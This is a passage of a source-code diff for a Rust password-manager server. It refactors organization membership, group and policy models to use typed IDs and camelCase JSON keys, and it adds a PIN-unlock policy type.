match UserOrganization::find_by_uuid(&self.users_organizations_uuid, conn).await {
|
match Membership::find_by_uuid(&self.users_organizations_uuid, conn).await {
|
||||||
Some(user) => User::update_uuid_revision(&user.user_uuid, conn).await,
|
Some(member) => User::update_uuid_revision(&member.user_uuid, conn).await,
|
||||||
None => warn!("User could not be found!"),
|
None => warn!("Member could not be found!"),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_by_group_id_and_user_id(
|
pub async fn delete_by_group_and_member(
|
||||||
group_uuid: &str,
|
group_uuid: &GroupId,
|
||||||
users_organizations_uuid: &str,
|
member_uuid: &MembershipId,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
match UserOrganization::find_by_uuid(users_organizations_uuid, conn).await {
|
match Membership::find_by_uuid(member_uuid, conn).await {
|
||||||
Some(user) => User::update_uuid_revision(&user.user_uuid, conn).await,
|
Some(member) => User::update_uuid_revision(&member.user_uuid, conn).await,
|
||||||
None => warn!("User could not be found!"),
|
None => warn!("Member could not be found!"),
|
||||||
};
|
};
|
||||||
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(groups_users::table)
|
diesel::delete(groups_users::table)
|
||||||
.filter(groups_users::groups_uuid.eq(group_uuid))
|
.filter(groups_users::groups_uuid.eq(group_uuid))
|
||||||
.filter(groups_users::users_organizations_uuid.eq(users_organizations_uuid))
|
.filter(groups_users::users_organizations_uuid.eq(member_uuid))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error deleting group users")
|
.map_res("Error deleting group users")
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_group(group_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> EmptyResult {
|
||||||
let group_users = GroupUser::find_by_group(group_uuid, conn).await;
|
let group_users = GroupUser::find_by_group(group_uuid, conn).await;
|
||||||
for group_user in group_users {
|
for group_user in group_users {
|
||||||
group_user.update_user_revision(conn).await;
|
group_user.update_user_revision(conn).await;
|
||||||
@@ -526,17 +598,35 @@ impl GroupUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user(users_organizations_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_member(member_uuid: &MembershipId, conn: &mut DbConn) -> EmptyResult {
|
||||||
match UserOrganization::find_by_uuid(users_organizations_uuid, conn).await {
|
match Membership::find_by_uuid(member_uuid, conn).await {
|
||||||
Some(user) => User::update_uuid_revision(&user.user_uuid, conn).await,
|
Some(member) => User::update_uuid_revision(&member.user_uuid, conn).await,
|
||||||
None => warn!("User could not be found!"),
|
None => warn!("Member could not be found!"),
|
||||||
}
|
}
|
||||||
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(groups_users::table)
|
diesel::delete(groups_users::table)
|
||||||
.filter(groups_users::users_organizations_uuid.eq(users_organizations_uuid))
|
.filter(groups_users::users_organizations_uuid.eq(member_uuid))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error deleting user groups")
|
.map_res("Error deleting user groups")
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
pub struct GroupId(String);
|
||||||
|
|||||||
@@ -12,22 +12,30 @@ mod org_policy;
|
|||||||
mod organization;
|
mod organization;
|
||||||
mod send;
|
mod send;
|
||||||
mod two_factor;
|
mod two_factor;
|
||||||
|
mod two_factor_duo_context;
|
||||||
mod two_factor_incomplete;
|
mod two_factor_incomplete;
|
||||||
mod user;
|
mod user;
|
||||||
|
|
||||||
pub use self::attachment::Attachment;
|
pub use self::attachment::{Attachment, AttachmentId};
|
||||||
pub use self::auth_request::AuthRequest;
|
pub use self::auth_request::{AuthRequest, AuthRequestId};
|
||||||
pub use self::cipher::Cipher;
|
pub use self::cipher::{Cipher, CipherId, RepromptType};
|
||||||
pub use self::collection::{Collection, CollectionCipher, CollectionUser};
|
pub use self::collection::{Collection, CollectionCipher, CollectionId, CollectionUser};
|
||||||
pub use self::device::{Device, DeviceType};
|
pub use self::device::{Device, DeviceId, DeviceType, PushId};
|
||||||
pub use self::emergency_access::{EmergencyAccess, EmergencyAccessStatus, EmergencyAccessType};
|
pub use self::emergency_access::{EmergencyAccess, EmergencyAccessId, EmergencyAccessStatus, EmergencyAccessType};
|
||||||
pub use self::event::{Event, EventType};
|
pub use self::event::{Event, EventType};
|
||||||
pub use self::favorite::Favorite;
|
pub use self::favorite::Favorite;
|
||||||
pub use self::folder::{Folder, FolderCipher};
|
pub use self::folder::{Folder, FolderCipher, FolderId};
|
||||||
pub use self::group::{CollectionGroup, Group, GroupUser};
|
pub use self::group::{CollectionGroup, Group, GroupId, GroupUser};
|
||||||
pub use self::org_policy::{OrgPolicy, OrgPolicyErr, OrgPolicyType};
|
pub use self::org_policy::{OrgPolicy, OrgPolicyErr, OrgPolicyId, OrgPolicyType};
|
||||||
pub use self::organization::{Organization, OrganizationApiKey, UserOrgStatus, UserOrgType, UserOrganization};
|
pub use self::organization::{
|
||||||
pub use self::send::{Send, SendType};
|
Membership, MembershipId, MembershipStatus, MembershipType, OrgApiKeyId, Organization, OrganizationApiKey,
|
||||||
|
OrganizationId,
|
||||||
|
};
|
||||||
|
pub use self::send::{
|
||||||
|
id::{SendFileId, SendId},
|
||||||
|
Send, SendType,
|
||||||
|
};
|
||||||
pub use self::two_factor::{TwoFactor, TwoFactorType};
|
pub use self::two_factor::{TwoFactor, TwoFactorType};
|
||||||
|
pub use self::two_factor_duo_context::TwoFactorDuoContext;
|
||||||
pub use self::two_factor_incomplete::TwoFactorIncomplete;
|
pub use self::two_factor_incomplete::TwoFactorIncomplete;
|
||||||
pub use self::user::{Invitation, User, UserKdfType, UserStampException};
|
pub use self::user::{Invitation, User, UserId, UserKdfType, UserStampException};
|
||||||
|
|||||||
@@ -1,27 +1,27 @@
|
|||||||
|
use derive_more::{AsRef, From};
|
||||||
use serde::Deserialize;
|
use serde::Deserialize;
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::api::EmptyResult;
|
use crate::api::EmptyResult;
|
||||||
use crate::db::DbConn;
|
use crate::db::DbConn;
|
||||||
use crate::error::MapResult;
|
use crate::error::MapResult;
|
||||||
use crate::util::UpCase;
|
|
||||||
|
|
||||||
use super::{TwoFactor, UserOrgStatus, UserOrgType, UserOrganization};
|
use super::{Membership, MembershipId, MembershipStatus, MembershipType, OrganizationId, TwoFactor, UserId};
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
#[diesel(table_name = org_policies)]
|
#[diesel(table_name = org_policies)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct OrgPolicy {
|
pub struct OrgPolicy {
|
||||||
pub uuid: String,
|
pub uuid: OrgPolicyId,
|
||||||
pub org_uuid: String,
|
pub org_uuid: OrganizationId,
|
||||||
pub atype: i32,
|
pub atype: i32,
|
||||||
pub enabled: bool,
|
pub enabled: bool,
|
||||||
pub data: String,
|
pub data: String,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// https://github.com/bitwarden/server/blob/b86a04cef9f1e1b82cf18e49fc94e017c641130c/src/Core/Enums/PolicyType.cs
|
// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Enums/PolicyType.cs
|
||||||
#[derive(Copy, Clone, Eq, PartialEq, num_derive::FromPrimitive)]
|
#[derive(Copy, Clone, Eq, PartialEq, num_derive::FromPrimitive)]
|
||||||
pub enum OrgPolicyType {
|
pub enum OrgPolicyType {
|
||||||
TwoFactorAuthentication = 0,
|
TwoFactorAuthentication = 0,
|
||||||
@@ -35,20 +35,26 @@ pub enum OrgPolicyType {
|
|||||||
ResetPassword = 8,
|
ResetPassword = 8,
|
||||||
// MaximumVaultTimeout = 9, // Not supported (Not AGPLv3 Licensed)
|
// MaximumVaultTimeout = 9, // Not supported (Not AGPLv3 Licensed)
|
||||||
// DisablePersonalVaultExport = 10, // Not supported (Not AGPLv3 Licensed)
|
// DisablePersonalVaultExport = 10, // Not supported (Not AGPLv3 Licensed)
|
||||||
|
// ActivateAutofill = 11,
|
||||||
|
// AutomaticAppLogIn = 12,
|
||||||
|
// FreeFamiliesSponsorshipPolicy = 13,
|
||||||
|
RemoveUnlockWithPin = 14,
|
||||||
}
|
}
|
||||||
|
|
||||||
// https://github.com/bitwarden/server/blob/5cbdee137921a19b1f722920f0fa3cd45af2ef0f/src/Core/Models/Data/Organizations/Policies/SendOptionsPolicyData.cs
|
// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Models/Data/Organizations/Policies/SendOptionsPolicyData.cs#L5
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct SendOptionsPolicyData {
|
pub struct SendOptionsPolicyData {
|
||||||
pub DisableHideEmail: bool,
|
#[serde(rename = "disableHideEmail", alias = "DisableHideEmail")]
|
||||||
|
pub disable_hide_email: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
// https://github.com/bitwarden/server/blob/5cbdee137921a19b1f722920f0fa3cd45af2ef0f/src/Core/Models/Data/Organizations/Policies/ResetPasswordDataModel.cs
|
// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Models/Data/Organizations/Policies/ResetPasswordDataModel.cs
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct ResetPasswordDataModel {
|
pub struct ResetPasswordDataModel {
|
||||||
pub AutoEnrollEnabled: bool,
|
#[serde(rename = "autoEnrollEnabled", alias = "AutoEnrollEnabled")]
|
||||||
|
pub auto_enroll_enabled: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
pub type OrgPolicyResult = Result<(), OrgPolicyErr>;
|
pub type OrgPolicyResult = Result<(), OrgPolicyErr>;
|
||||||
@@ -61,9 +67,9 @@ pub enum OrgPolicyErr {
|
|||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl OrgPolicy {
|
impl OrgPolicy {
|
||||||
pub fn new(org_uuid: String, atype: OrgPolicyType, data: String) -> Self {
|
pub fn new(org_uuid: OrganizationId, atype: OrgPolicyType, data: String) -> Self {
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: OrgPolicyId(crate::util::get_uuid()),
|
||||||
org_uuid,
|
org_uuid,
|
||||||
atype: atype as i32,
|
atype: atype as i32,
|
||||||
enabled: false,
|
enabled: false,
|
||||||
@@ -77,14 +83,24 @@ impl OrgPolicy {
|
|||||||
|
|
||||||
pub fn to_json(&self) -> Value {
|
pub fn to_json(&self) -> Value {
|
||||||
let data_json: Value = serde_json::from_str(&self.data).unwrap_or(Value::Null);
|
let data_json: Value = serde_json::from_str(&self.data).unwrap_or(Value::Null);
|
||||||
json!({
|
let mut policy = json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"OrganizationId": self.org_uuid,
|
"organizationId": self.org_uuid,
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
"Data": data_json,
|
"data": data_json,
|
||||||
"Enabled": self.enabled,
|
"enabled": self.enabled,
|
||||||
"Object": "policy",
|
"object": "policy",
|
||||||
})
|
});
|
||||||
|
|
||||||
|
// Upstream adds this key/value
|
||||||
|
// Allow enabling Single Org policy when the organization has claimed domains.
|
||||||
|
// See: (https://github.com/bitwarden/server/pull/5565)
|
||||||
|
// We return the same to prevent possible issues
|
||||||
|
if self.atype == 8i32 {
|
||||||
|
policy["canToggleState"] = json!(true);
|
||||||
|
}
|
||||||
|
|
||||||
|
policy
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -114,7 +130,7 @@ impl OrgPolicy {
|
|||||||
// We need to make sure we're not going to violate the unique constraint on org_uuid and atype.
|
// We need to make sure we're not going to violate the unique constraint on org_uuid and atype.
|
||||||
// This happens automatically on other DBMS backends due to replace_into(). PostgreSQL does
|
// This happens automatically on other DBMS backends due to replace_into(). PostgreSQL does
|
||||||
// not support multiple constraints on ON CONFLICT clauses.
|
// not support multiple constraints on ON CONFLICT clauses.
|
||||||
diesel::delete(
|
let _: () = diesel::delete(
|
||||||
org_policies::table
|
org_policies::table
|
||||||
.filter(org_policies::org_uuid.eq(&self.org_uuid))
|
.filter(org_policies::org_uuid.eq(&self.org_uuid))
|
||||||
.filter(org_policies::atype.eq(&self.atype)),
|
.filter(org_policies::atype.eq(&self.atype)),
|
||||||
@@ -141,17 +157,7 @@ impl OrgPolicy {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
|
||||||
org_policies::table
|
|
||||||
.filter(org_policies::uuid.eq(uuid))
|
|
||||||
.first::<OrgPolicyDb>(conn)
|
|
||||||
.ok()
|
|
||||||
.from_db()
|
|
||||||
}}
|
|
||||||
}
|
|
||||||
|
|
||||||
pub async fn find_by_org(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
org_policies::table
|
org_policies::table
|
||||||
.filter(org_policies::org_uuid.eq(org_uuid))
|
.filter(org_policies::org_uuid.eq(org_uuid))
|
||||||
@@ -161,7 +167,7 @@ impl OrgPolicy {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_confirmed_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_confirmed_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
org_policies::table
|
org_policies::table
|
||||||
.inner_join(
|
.inner_join(
|
||||||
@@ -170,7 +176,7 @@ impl OrgPolicy {
|
|||||||
.and(users_organizations::user_uuid.eq(user_uuid)))
|
.and(users_organizations::user_uuid.eq(user_uuid)))
|
||||||
)
|
)
|
||||||
.filter(
|
.filter(
|
||||||
users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
|
users_organizations::status.eq(MembershipStatus::Confirmed as i32)
|
||||||
)
|
)
|
||||||
.select(org_policies::all_columns)
|
.select(org_policies::all_columns)
|
||||||
.load::<OrgPolicyDb>(conn)
|
.load::<OrgPolicyDb>(conn)
|
||||||
@@ -179,7 +185,11 @@ impl OrgPolicy {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_org_and_type(org_uuid: &str, policy_type: OrgPolicyType, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_org_and_type(
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
policy_type: OrgPolicyType,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
org_policies::table
|
org_policies::table
|
||||||
.filter(org_policies::org_uuid.eq(org_uuid))
|
.filter(org_policies::org_uuid.eq(org_uuid))
|
||||||
@@ -190,7 +200,7 @@ impl OrgPolicy {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_organization(org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(org_policies::table.filter(org_policies::org_uuid.eq(org_uuid)))
|
diesel::delete(org_policies::table.filter(org_policies::org_uuid.eq(org_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -199,9 +209,9 @@ impl OrgPolicy {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_accepted_and_confirmed_by_user_and_active_policy(
|
pub async fn find_accepted_and_confirmed_by_user_and_active_policy(
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
policy_type: OrgPolicyType,
|
policy_type: OrgPolicyType,
|
||||||
conn: &mut DbConn,
|
conn: &DbConn,
|
||||||
) -> Vec<Self> {
|
) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
org_policies::table
|
org_policies::table
|
||||||
@@ -211,10 +221,10 @@ impl OrgPolicy {
|
|||||||
.and(users_organizations::user_uuid.eq(user_uuid)))
|
.and(users_organizations::user_uuid.eq(user_uuid)))
|
||||||
)
|
)
|
||||||
.filter(
|
.filter(
|
||||||
users_organizations::status.eq(UserOrgStatus::Accepted as i32)
|
users_organizations::status.eq(MembershipStatus::Accepted as i32)
|
||||||
)
|
)
|
||||||
.or_filter(
|
.or_filter(
|
||||||
users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
|
users_organizations::status.eq(MembershipStatus::Confirmed as i32)
|
||||||
)
|
)
|
||||||
.filter(org_policies::atype.eq(policy_type as i32))
|
.filter(org_policies::atype.eq(policy_type as i32))
|
||||||
.filter(org_policies::enabled.eq(true))
|
.filter(org_policies::enabled.eq(true))
|
||||||
@@ -226,7 +236,7 @@ impl OrgPolicy {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_confirmed_by_user_and_active_policy(
|
pub async fn find_confirmed_by_user_and_active_policy(
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
policy_type: OrgPolicyType,
|
policy_type: OrgPolicyType,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Vec<Self> {
|
) -> Vec<Self> {
|
||||||
@@ -238,7 +248,7 @@ impl OrgPolicy {
|
|||||||
.and(users_organizations::user_uuid.eq(user_uuid)))
|
.and(users_organizations::user_uuid.eq(user_uuid)))
|
||||||
)
|
)
|
||||||
.filter(
|
.filter(
|
||||||
users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
|
users_organizations::status.eq(MembershipStatus::Confirmed as i32)
|
||||||
)
|
)
|
||||||
.filter(org_policies::atype.eq(policy_type as i32))
|
.filter(org_policies::atype.eq(policy_type as i32))
|
||||||
.filter(org_policies::enabled.eq(true))
|
.filter(org_policies::enabled.eq(true))
|
||||||
@@ -253,21 +263,21 @@ impl OrgPolicy {
|
|||||||
/// and the user is not an owner or admin of that org. This is only useful for checking
|
/// and the user is not an owner or admin of that org. This is only useful for checking
|
||||||
/// applicability of policy types that have these particular semantics.
|
/// applicability of policy types that have these particular semantics.
|
||||||
pub async fn is_applicable_to_user(
|
pub async fn is_applicable_to_user(
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
policy_type: OrgPolicyType,
|
policy_type: OrgPolicyType,
|
||||||
exclude_org_uuid: Option<&str>,
|
exclude_org_uuid: Option<&OrganizationId>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> bool {
|
) -> bool {
|
||||||
for policy in
|
for policy in
|
||||||
OrgPolicy::find_accepted_and_confirmed_by_user_and_active_policy(user_uuid, policy_type, conn).await
|
OrgPolicy::find_accepted_and_confirmed_by_user_and_active_policy(user_uuid, policy_type, conn).await
|
||||||
{
|
{
|
||||||
// Check if we need to skip this organization.
|
// Check if we need to skip this organization.
|
||||||
if exclude_org_uuid.is_some() && exclude_org_uuid.unwrap() == policy.org_uuid {
|
if exclude_org_uuid.is_some() && *exclude_org_uuid.unwrap() == policy.org_uuid {
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
|
|
||||||
if let Some(user) = UserOrganization::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
|
if let Some(user) = Membership::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
|
||||||
if user.atype < UserOrgType::Admin {
|
if user.atype < MembershipType::Admin {
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -276,8 +286,8 @@ impl OrgPolicy {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn is_user_allowed(
|
pub async fn is_user_allowed(
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
org_uuid: &str,
|
org_uuid: &OrganizationId,
|
||||||
exclude_current_org: bool,
|
exclude_current_org: bool,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> OrgPolicyResult {
|
) -> OrgPolicyResult {
|
||||||
@@ -305,11 +315,11 @@ impl OrgPolicy {
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn org_is_reset_password_auto_enroll(org_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn org_is_reset_password_auto_enroll(org_uuid: &OrganizationId, conn: &mut DbConn) -> bool {
|
||||||
match OrgPolicy::find_by_org_and_type(org_uuid, OrgPolicyType::ResetPassword, conn).await {
|
match OrgPolicy::find_by_org_and_type(org_uuid, OrgPolicyType::ResetPassword, conn).await {
|
||||||
Some(policy) => match serde_json::from_str::<UpCase<ResetPasswordDataModel>>(&policy.data) {
|
Some(policy) => match serde_json::from_str::<ResetPasswordDataModel>(&policy.data) {
|
||||||
Ok(opts) => {
|
Ok(opts) => {
|
||||||
return policy.enabled && opts.data.AutoEnrollEnabled;
|
return policy.enabled && opts.auto_enroll_enabled;
|
||||||
}
|
}
|
||||||
_ => error!("Failed to deserialize ResetPasswordDataModel: {}", policy.data),
|
_ => error!("Failed to deserialize ResetPasswordDataModel: {}", policy.data),
|
||||||
},
|
},
|
||||||
@@ -321,15 +331,15 @@ impl OrgPolicy {
|
|||||||
|
|
||||||
/// Returns true if the user belongs to an org that has enabled the `DisableHideEmail`
|
/// Returns true if the user belongs to an org that has enabled the `DisableHideEmail`
|
||||||
/// option of the `Send Options` policy, and the user is not an owner or admin of that org.
|
/// option of the `Send Options` policy, and the user is not an owner or admin of that org.
|
||||||
pub async fn is_hide_email_disabled(user_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn is_hide_email_disabled(user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
for policy in
|
for policy in
|
||||||
OrgPolicy::find_confirmed_by_user_and_active_policy(user_uuid, OrgPolicyType::SendOptions, conn).await
|
OrgPolicy::find_confirmed_by_user_and_active_policy(user_uuid, OrgPolicyType::SendOptions, conn).await
|
||||||
{
|
{
|
||||||
if let Some(user) = UserOrganization::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
|
if let Some(user) = Membership::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
|
||||||
if user.atype < UserOrgType::Admin {
|
if user.atype < MembershipType::Admin {
|
||||||
match serde_json::from_str::<UpCase<SendOptionsPolicyData>>(&policy.data) {
|
match serde_json::from_str::<SendOptionsPolicyData>(&policy.data) {
|
||||||
Ok(opts) => {
|
Ok(opts) => {
|
||||||
if opts.data.DisableHideEmail {
|
if opts.disable_hide_email {
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -340,4 +350,20 @@ impl OrgPolicy {
|
|||||||
}
|
}
|
||||||
false
|
false
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn is_enabled_for_member(
|
||||||
|
member_uuid: &MembershipId,
|
||||||
|
policy_type: OrgPolicyType,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> bool {
|
||||||
|
if let Some(member) = Membership::find_by_uuid(member_uuid, conn).await {
|
||||||
|
if let Some(policy) = OrgPolicy::find_by_org_and_type(&member.org_uuid, policy_type, conn).await {
|
||||||
|
return policy.enabled;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
false
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Clone, Debug, AsRef, DieselNewType, From, FromForm, PartialEq, Eq, Hash, Serialize, Deserialize)]
|
||||||
|
pub struct OrgPolicyId(String);
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -1,7 +1,10 @@
|
|||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use super::User;
|
use crate::{config::PathType, util::LowerCase, CONFIG};
|
||||||
|
|
||||||
|
use super::{OrganizationId, User, UserId};
|
||||||
|
use id::SendId;
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
@@ -9,11 +12,10 @@ db_object! {
|
|||||||
#[diesel(treat_none_as_null = true)]
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct Send {
|
pub struct Send {
|
||||||
pub uuid: String,
|
pub uuid: SendId,
|
||||||
|
|
||||||
pub user_uuid: Option<String>,
|
|
||||||
pub organization_uuid: Option<String>,
|
|
||||||
|
|
||||||
|
pub user_uuid: Option<UserId>,
|
||||||
|
pub organization_uuid: Option<OrganizationId>,
|
||||||
|
|
||||||
pub name: String,
|
pub name: String,
|
||||||
pub notes: Option<String>,
|
pub notes: Option<String>,
|
||||||
@@ -49,7 +51,7 @@ impl Send {
|
|||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: SendId::from(crate::util::get_uuid()),
|
||||||
user_uuid: None,
|
user_uuid: None,
|
||||||
organization_uuid: None,
|
organization_uuid: None,
|
||||||
|
|
||||||
@@ -122,48 +124,58 @@ impl Send {
|
|||||||
use data_encoding::BASE64URL_NOPAD;
|
use data_encoding::BASE64URL_NOPAD;
|
||||||
use uuid::Uuid;
|
use uuid::Uuid;
|
||||||
|
|
||||||
let data: Value = serde_json::from_str(&self.data).unwrap_or_default();
|
let mut data = serde_json::from_str::<LowerCase<Value>>(&self.data).map(|d| d.data).unwrap_or_default();
|
||||||
|
|
||||||
|
// Mobile clients expect size to be a string instead of a number
|
||||||
|
if let Some(size) = data.get("size").and_then(|v| v.as_i64()) {
|
||||||
|
data["size"] = Value::String(size.to_string());
|
||||||
|
}
|
||||||
|
|
||||||
json!({
|
json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"AccessId": BASE64URL_NOPAD.encode(Uuid::parse_str(&self.uuid).unwrap_or_default().as_bytes()),
|
"accessId": BASE64URL_NOPAD.encode(Uuid::parse_str(&self.uuid).unwrap_or_default().as_bytes()),
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
|
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"Notes": self.notes,
|
"notes": self.notes,
|
||||||
"Text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
|
"text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
|
||||||
"File": if self.atype == SendType::File as i32 { Some(&data) } else { None },
|
"file": if self.atype == SendType::File as i32 { Some(&data) } else { None },
|
||||||
|
|
||||||
"Key": self.akey,
|
"key": self.akey,
|
||||||
"MaxAccessCount": self.max_access_count,
|
"maxAccessCount": self.max_access_count,
|
||||||
"AccessCount": self.access_count,
|
"accessCount": self.access_count,
|
||||||
"Password": self.password_hash.as_deref().map(|h| BASE64URL_NOPAD.encode(h)),
|
"password": self.password_hash.as_deref().map(|h| BASE64URL_NOPAD.encode(h)),
|
||||||
"Disabled": self.disabled,
|
"disabled": self.disabled,
|
||||||
"HideEmail": self.hide_email,
|
"hideEmail": self.hide_email,
|
||||||
|
|
||||||
"RevisionDate": format_date(&self.revision_date),
|
"revisionDate": format_date(&self.revision_date),
|
||||||
"ExpirationDate": self.expiration_date.as_ref().map(format_date),
|
"expirationDate": self.expiration_date.as_ref().map(format_date),
|
||||||
"DeletionDate": format_date(&self.deletion_date),
|
"deletionDate": format_date(&self.deletion_date),
|
||||||
"Object": "send",
|
"object": "send",
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn to_json_access(&self, conn: &mut DbConn) -> Value {
|
pub async fn to_json_access(&self, conn: &mut DbConn) -> Value {
|
||||||
use crate::util::format_date;
|
use crate::util::format_date;
|
||||||
|
|
||||||
let data: Value = serde_json::from_str(&self.data).unwrap_or_default();
|
let mut data = serde_json::from_str::<LowerCase<Value>>(&self.data).map(|d| d.data).unwrap_or_default();
|
||||||
|
|
||||||
|
// Mobile clients expect size to be a string instead of a number
|
||||||
|
if let Some(size) = data.get("size").and_then(|v| v.as_i64()) {
|
||||||
|
data["size"] = Value::String(size.to_string());
|
||||||
|
}
|
||||||
|
|
||||||
json!({
|
json!({
